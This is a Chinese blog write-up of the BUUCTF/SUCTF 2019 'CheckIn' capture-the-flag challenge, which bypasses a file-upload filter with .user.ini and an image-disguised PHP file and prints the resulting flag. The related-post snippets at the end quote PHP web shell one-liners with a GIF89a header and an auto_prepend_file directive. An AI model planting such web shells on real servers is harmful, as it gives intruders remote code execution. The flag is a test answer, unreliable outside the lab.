BUUCTF [web专项28][SUCTF 2019]CheckIn

已于 2023-11-06 16:28:34 修改
阅读量94 收藏
点赞数
文章标签: web安全 网络安全
于 2023-11-06 16:28:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanglinchiji/article/details/134247307
版权

进入后发现是个上传文件的题

先上传phtml后缀试试

发现错误,再次上传,但是修改类型

还是错误

想到前面做过一道上传题,上传图片后用.htaccess文件修改上传目录的指定文件后缀

尝试一下

先把phtml后缀改为jpg

新建一个.htaccess文件

发现成功上传

我们再上传一次图片获取上传目录

用蚁剑连接

发现错误,网上冲浪

参考:buuctf-SUCTF 2019 CheckIn(小宇特详解)_buuctf checkin_小宇特详解的博客-CSDN博客

.htaccess和.user.ini_tomcat user.ini_nigo134的博客-CSDN博客

 到底还是没有理解出来个所以然,应该是后台检测到该后缀自动删除之类的?

我也不晓得了,如果有大佬知道请教教我!!!

看了别人的,发现别人用.user.ini来操作

上传

成功后修改一下1.jpg再次上传(命令输出flag)

上传成功后,进入所给的目录

即可获得flag

flag{aab36088-690e-437b-8f81-6e2a3e41f0a0}

yanglin_371
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF [SUCTF 2019]CheckIn
qq_42158602的博客
02-07 1591
拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功 发现添加图片头文件就可以绕过 GIF89a 上传php文件的时候发现过滤了<? 绕过检测 <script language='php'></script> 构造图片马 GIF89a <script language='php'>eval($_GET['...
checkin:会议签到 Web 应用程序
06-01
会议签到 Web 应用程序刷您的 ID 或输入您的信息以在任何会议上签到。依赖关系目前正在运行 , MySQL数据库Google Drive .NET SDK、Google Sheets .NET SDK、Google OAuth .NET SDK(用于 IEEECheckin.ASPDocs)版本...
BUUCTF-CheckIn
m0_47571887的博客
11-09 790
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
BUUCTF---web---[SUCTF 2019]CheckIn
最新发布
2201_75556700的博客
06-11 913
7、先上传.user.ini文件,再上传图片马test.jpg。上传.user.ini后出现下面回显。.user.ini文件内容为:(文件命名必须和上传的图片马文件名一样,我这里是test.jpg)2、上传正常的jpg文件,提示内容不能有<?4、将上面的一句话木马先写成txt再修改后缀为test.jpg后上传。5、必须要是图片类型,将一句话木马,添加图片头后再上传。6、上传成功了,但是需要让图片马当成php代码来执行。10、使用系统函数,查看文件根目录,发现flag文件。9、测试,发现文件上传成功。
Buuctf [GKCTF2020]CheckIN
CyhDl666的博客
03-19 328
进入网站直接贴了源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
BUUCTF_web_CheckIn
silence1_的博客
08-31 2181
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
[BUUCTF]CheckIn (writeup)
weixin_63306244的博客
06-22 171
因为.user.ini是将a.png放到index.php文件的顶部进行执行。回显:exif_imagetype:not image!蚁剑后面的文件是index.php并不是a.png。所以要访问的是index.php。看到这个后就可以直接上蚁剑了。进入后看到是一道上传题。那就只剩下最后一种办法。随后看看了之前用过的。
checkin:SSM做的签到系统Web实现
04-29
SSM框架 实现简单的签到系统 sql 设计 create table user( user_id INT NOT NULL AUTO_INCREMENT, user_name VARCHAR(40) NOT NULL, user_email VARCHAR(100), user_password VARCHAR(100) NOT NULL, ...
checkin
03-18
【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,同时对深层链接的概念进行实践。深层...
asp.net定位签到系统.rar
07-01
基于asp.net mvc的定位签到系统,后台使用layui,json格式数据传输,简单三层结构,后台可看到使用人员基本情况,出勤率,早退,迟到等数据。数据库,手机h5页面,后台齐全。...自己辛苦做的,请给好评,里面有基本注释...
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1150
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
BUUCTF-[SUCTF 2019]CheckIn
m0_61361405的博客
10-10 124
`: 这个条件语句使用正则表达式检查 `$extension` 是否包含 "ph" 或 "htacess",如果是,表示上传的文件扩展名不被允许,代码将输出 "illegal suffix!13. `if (!`: 这行代码使用 `scandir` 函数列出目录 `$userdir` 中的文件和子目录,并将结果打印出来,以展示上传到该目录的文件列表。4. `if (isset($_POST["upload"])) {`: 这个条件语句检查是否有名为 "upload" 的 POST 参数被发送到服务器。
buuctf WEB checkin1
qq_41696858的博客
09-28 271
这题考的文件上传 经典一句话先试试,回显文件格式不对,把php文件后缀改成jpg格式 第二次回显,显示文件中包含<?,那就把一句话,改成如下形式 <script language='php'>eval($_POST['niaho']);</script> 成功绕过<?匹配,回显不是图片格式,图片头绕过GIF89a 成功上传,下面就是如何上传php文件,或者执行php代码了 经过检测,对于文件类型进行了严格的过滤,改后缀肯定不行 经过检测,可以上传.user.ini文件(
BUUCTF】[SUCTF 2019]CheckIn
aoao331198的博客
04-09 493
废话不多讲,老生常谈的文件上传题目 需要传一个图片马 GIF89a <script language='php'>@eval($_POST['abc']);</script> 还有一个.user.ini文件 文件上传之.user.ini GIF89a auto_prepend_file=upload.jpg 作用是指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。 蚁剑链接 http://c8a6d5ca-0f52-4c27-a06f-
BUUCTF WEB [SUCTF 2019]CheckIn
A_dmin的博客
12-14 1532
BUUCTF WEB [SUCTF 2019]CheckIn 打开页面是一个上传界面: 而且题目提示给了源码!GitHub上面,看了看还有flag嘞~~ 这不重要,我是来看源码的!!!index.php源码如下: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8">...
BUUCTF:[SUCTF 2019]CheckIn
末初的CSDN博客
11-04 1283
题目地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 上传文件后缀名黑名单机制,常用php及相关可解析扩展名等无法成功上传 使用.user.ini构造后门 user.ini如何构造后门详情见P神:https://www.leavesongs.com/PENETRATION/php-user-ini-backdoor.html 首先制造图片马 图片马不能包含<?,使用 <script language="php">eval($.
BUUCTF:[GKCTF2020]CheckIN
qq_46230755的博客
12-16 512
这题还是很有意思的,考的点有 先看一下题目给的代码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this
2021gkctf checkin
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值